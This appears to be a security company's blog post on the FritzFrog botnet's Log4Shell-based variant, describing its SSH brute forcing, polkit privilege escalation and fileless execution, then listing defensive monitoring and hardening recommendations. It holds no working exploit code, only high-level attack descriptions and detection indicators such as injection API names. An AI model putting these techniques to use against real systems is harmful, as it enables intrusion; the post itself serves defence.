fritzfrog-CyberNEXT
fritzfrog-CyberNEXT
FritzFrog: An Overview of the New Botnet Variant Exploit Called ‘Frog4Shell’
February 26, 2024
Posted By: Research Team

FritzFrog: An Overview of the New Botnet Variant Exploit Called ‘Frog4Shell’ that Infects using Log4Shell

 

The Akamai Security Intelligence Group uncovered a new variant of the FritzFrog botnet leveraging the Log4Shell vulnerability, dubbed Frog4Shell. This evolution marks a significant shift in tactics with FritzFrog now employing brute-force SSH attacks and Log4Shell exploitation to compromise internet-facing servers and internal hosts. Additionally, the malware incorporates a privilege escalation module targeting CVE-2021-4034 in polkit, enabling root access on vulnerable servers. 

 

Existing Version

 

  • Initial Compromise

 

FritzFrog infects internet-facing servers via SSH brute force attacks.

 

FritzFrog initiates its attack by exploiting weak SSH credentials on internet-facing servers. This method allows the attacker to gain initial access to a wide range of targets. The brute force technique enables FritzFrog to compromise thousands of servers over time to establish a foothold within various networks.

 

New Version

 

  • Log4Shell Exploitation

 

FritzFrog targets Log4Shell vulnerability, injecting payloads through HTTP headers.

 

FritzFrog evolves its tactics by leveraging the Log4Shell vulnerability, also known as Frog4Shell. This exploit enables the malware to inject payloads through HTTP headers leveraging the vulnerability in Java applications. By targeting ports commonly used by HTTP servers (such as 8080, 8090, 8888, and 9000), FritzFrog triggers the Log4Shell vulnerability indiscriminately across a broad range of potential targets.

 

  • Internal Network Scanning

 

FritzFrog scans the internal network for Log4Shell vulnerable hosts.


After compromising internet-facing servers, FritzFrog extends its reach within internal networks. The malware scans the network to identify additional vulnerable hosts, further propagating its infection.

 

  • Privilege Escalation

 

FritzFrog gains root access on vulnerable servers by exploiting CVE-2021-4034.

 

FritzFrog integrates a privilege escalation module to exploit the CVE-2021-4034 vulnerability in polkit. This module allows the malware to elevate its privileges, gaining root access on vulnerable servers. By exploiting this security flaw, FritzFrog can execute commands and actions with heightened permissions, enhancing its capabilities for persistence and lateral movement within the compromised environment.

 

  • Evasion Techniques

 

Malware employs fileless execution using /dev/shm and memfd_create.


FritzFrog employs sophisticated evasion techniques, such as leveraging fileless execution using Linux features such as /dev/shm and memfd_create. With this method, the malware can execute payloads without leaving traces on disk, thus minimizing the likelihood of detection by traditional security measures. This stealthy approach enables FritzFrog to operate covertly within compromised environments, prolonging its presence and mitigating the risk of detection.

 

Recommendations

 

The recent resurgence of the FritzFrog botnet, leveraging the infamous Log4Shell vulnerability, puts networks at risk. Researchers provided a detection script for signs of a FritzFrog infection on SSH servers. In addition, here are recommendations to consider to bolster defenses against FritzFrog:

 

Monitor suspicious commands, track file access, scrutinize network traffic, and check for new processes.

 

  • Regularly monitor executed commands and their arguments, particularly those attempting to gather information about other systems on the network using IP addresses or hostnames. Closely track executed commands and arguments using tools like “ping,” “netstat,” “nmap,” or scripts searching for hostnames or IP addresses. Pay attention to commands executed in quick succession, suggesting automated scans and commands executed by unexpected or unauthorized users, especially in AAA logs for network devices.

 

  • Utilize Windows PowerShell log Event ID 4104 to capture PowerShell script block contents, focusing on commands indicative of RDP Hijacking precursors, like enumerating systems with RDP access.

 

  • Monitor attempts to access local files holding host information, like “/etc/hosts” on Linux or “C:\Windows\System32\Drivers\etc\hosts” on Windows. Utilize event logs (like Windows Event ID 4663 or Linux auditd logs) for alerts on this access.

 

  • Monitor network connections for suspicious patterns, especially new connections associated with pings or scans that could indicate an attempt to enumerate other systems on the network as associated with ping sweeps, port scans, or other discovery protocols. 

 

  • Monitor for the creation of new processes that may be used for discovering remote systems, such as ping.exe and tracert.exe, especially when executed in rapid succession. Flag instances where these processes are used inconsistent with typical system operation.

 

Configure endpoint security solutions and employ Yama and security kernel modules. Focus on closely monitoring file metadata, modifications, access attempts, module load, and OS API execution.

 

  • Make use of endpoint security programs that provide behavior-based preventive features. These can prevent popular process injection methods depending on particular activity sequences. For example, Windows 10’s Attack Surface Reduction (ASR) regulations can prevent code injection in Office apps.

 

  • Implement stricter controls on privileged accounts, limiting their ability to inject code into processes. Employ Yama, such as /proc/sys/kernel/yama/ptrace_scope, to restrict ptrace-based process injection to privileged users only. Tools like Yama (on Linux) can restrict the use of “ptrace” (a debugging tool used for injection) to only authorized users.

 

  • Consider deploying advanced security modules like SELinux, grsecurity, or AppArmor. These provide granular access control and process restrictions, further hindering injection attempts.

 

  • Monitor contextual data about files for changes indicating code injection attempts, such as modifications to inject code into processes to evade defenses or elevate privileges.

 

  • Track DLL/PE file events, specifically the creation and loading of DLLs into processes. Identify unfamiliar or unexpected DLLs that shouldn’t be loaded normally.

 

  • Keep an eye on Windows API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, VirtualAllocEx, and WriteProcessMemory, which can be indicators of code injection. For Linux systems, monitor specialized system calls like ptrace, which are effective in detecting common process injection methods without generating excessive data.

 

  • Monitor processes for unauthorized viewing and modifications, particularly those attempting to inject code to evade defenses or escalate privileges. Check for process memory inconsistencies, comparing memory ranges against known legitimate modules to detect unauthorized modifications.

 

Enforce strong password policies, account lockout policies, and multi-factor authentication (MFA).

 

  • Implement minimum password length requirements (e.g., 12 characters), and complexity requirements (including upper/lowercase, numbers, and symbols). Consider password managers to reduce password reuse or insecure passwords.

 

  • Set account lockout policies after a specific number of failed logins (e.g., 5 attempts). This prevents attackers from guessing passwords through trial and error. However, avoid overly strict policies that might lock out legitimate users and create denial-of-service situations. Follow NIST recommendations when creating password policies. 

 

  • Use conditional access restrictions to prevent logins from non-compliant devices or IP addresses outside of specified organization ranges. Restricting the number of attempts an attacker may make aids in repelling brute force attacks.

 

  • Enforce multi-factor authentication (MFA) wherever possible, especially on externally facing services. This considerably lowers the possibility that brute force assaults will be effective even in the event that credentials are stolen.

 

Implement controls to block the download, transfer, and execution of potentially uncommon file types.

 

  • Put in place controls to prevent downloading, transferring, and running unusual file formats known to be used in hostile campaigns. This covers file formats including executables, scripts, and compressed packages that are frequently linked to malware. Apply rules that limit access to questionable or unreliable websites that are known to disseminate harmful content using web content filtering solutions.

 

  • To remain ahead of emerging threats and adversarial strategies, regularly update web filtering rules based on threat intelligence feeds. Inform users of the risks tofdownloading and running files from unreliable sources and stress the need to always confirm the legitimacy of content before engaging with it.